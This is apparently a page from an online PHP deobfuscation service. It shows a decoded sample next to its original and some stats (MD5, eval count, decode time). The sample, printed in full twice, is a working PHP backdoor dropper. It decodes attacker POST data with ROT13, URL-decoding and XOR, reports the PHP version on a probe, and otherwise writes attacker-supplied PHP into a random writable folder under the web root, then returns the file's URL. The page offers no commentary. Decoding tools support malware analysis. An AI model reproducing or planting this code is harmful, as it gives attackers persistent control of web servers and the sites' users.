Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $owophe = "ndexopyiduofmqyr";$bdyiya = "";foreach ($_POST as $xuuxzbha => $ohyjosgyv..
Decoded Output download
<?php $owophe = "ndexopyiduofmqyr";$bdyiya = "";foreach ($_POST as $xuuxzbha => $ohyjosgyv){if (strlen($xuuxzbha) == 16 and substr_count($ohyjosgyv, "%") > 10){oaggbnzftc($xuuxzbha, $ohyjosgyv);}}function oaggbnzftc($xuuxzbha, $twpec){global $bdyiya;$bdyiya = $xuuxzbha;$twpec = str_split(rawurldecode(str_rot13($twpec)));function okyoyvkvi($frkbw, $xuuxzbha){global $owophe, $bdyiya;return $frkbw ^ $owophe[$xuuxzbha % strlen($owophe)] ^ $bdyiya[$xuuxzbha % strlen($bdyiya)];}$twpec = implode("", array_map("okyoyvkvi", array_values($twpec), array_keys($twpec)));$twpec = @unserialize($twpec);if (@is_array($twpec)){$xuuxzbha = array_keys($twpec);$twpec = $twpec[$xuuxzbha[0]];if ($twpec === $xuuxzbha[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function dbpkiukqtu($yaayfduklpir) {static $xuwfbc = array();$soqgw = glob($yaayfduklpir . '/*', GLOB_ONLYDIR);if (count($soqgw) > 0) {foreach ($soqgw as $yaayfduklp){if (@is_writable($yaayfduklp)){$xuwfbc[] = $yaayfduklp;}}}foreach ($soqgw as $yaayfduklpir) dbpkiukqtu($yaayfduklpir);return $xuwfbc;}$mrcezflm = $_SERVER["DOCUMENT_ROOT"];$soqgw = dbpkiukqtu($mrcezflm);$xuuxzbha = array_rand($soqgw);$epiwvr = $soqgw[$xuuxzbha] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($epiwvr, $twpec);echo "http://" . $_SERVER["HTTP_HOST"] . substr($epiwvr, strlen($mrcezflm));exit();}}} ?>
Did this file decode correctly?
Original Code
<?php $owophe = "ndexopyiduofmqyr";$bdyiya = "";foreach ($_POST as $xuuxzbha => $ohyjosgyv){if (strlen($xuuxzbha) == 16 and substr_count($ohyjosgyv, "%") > 10){oaggbnzftc($xuuxzbha, $ohyjosgyv);}}function oaggbnzftc($xuuxzbha, $twpec){global $bdyiya;$bdyiya = $xuuxzbha;$twpec = str_split(rawurldecode(str_rot13($twpec)));function okyoyvkvi($frkbw, $xuuxzbha){global $owophe, $bdyiya;return $frkbw ^ $owophe[$xuuxzbha % strlen($owophe)] ^ $bdyiya[$xuuxzbha % strlen($bdyiya)];}$twpec = implode("", array_map("okyoyvkvi", array_values($twpec), array_keys($twpec)));$twpec = @unserialize($twpec);if (@is_array($twpec)){$xuuxzbha = array_keys($twpec);$twpec = $twpec[$xuuxzbha[0]];if ($twpec === $xuuxzbha[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function dbpkiukqtu($yaayfduklpir) {static $xuwfbc = array();$soqgw = glob($yaayfduklpir . '/*', GLOB_ONLYDIR);if (count($soqgw) > 0) {foreach ($soqgw as $yaayfduklp){if (@is_writable($yaayfduklp)){$xuwfbc[] = $yaayfduklp;}}}foreach ($soqgw as $yaayfduklpir) dbpkiukqtu($yaayfduklpir);return $xuwfbc;}$mrcezflm = $_SERVER["DOCUMENT_ROOT"];$soqgw = dbpkiukqtu($mrcezflm);$xuuxzbha = array_rand($soqgw);$epiwvr = $soqgw[$xuuxzbha] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($epiwvr, $twpec);echo "http://" . $_SERVER["HTTP_HOST"] . substr($epiwvr, strlen($mrcezflm));exit();}}}
Function Calls
None |
Stats
MD5 | 6f262e9b73df2861a9c40b0f9ce5b7a7 |
Eval Count | 0 |
Decode Time | 78 ms |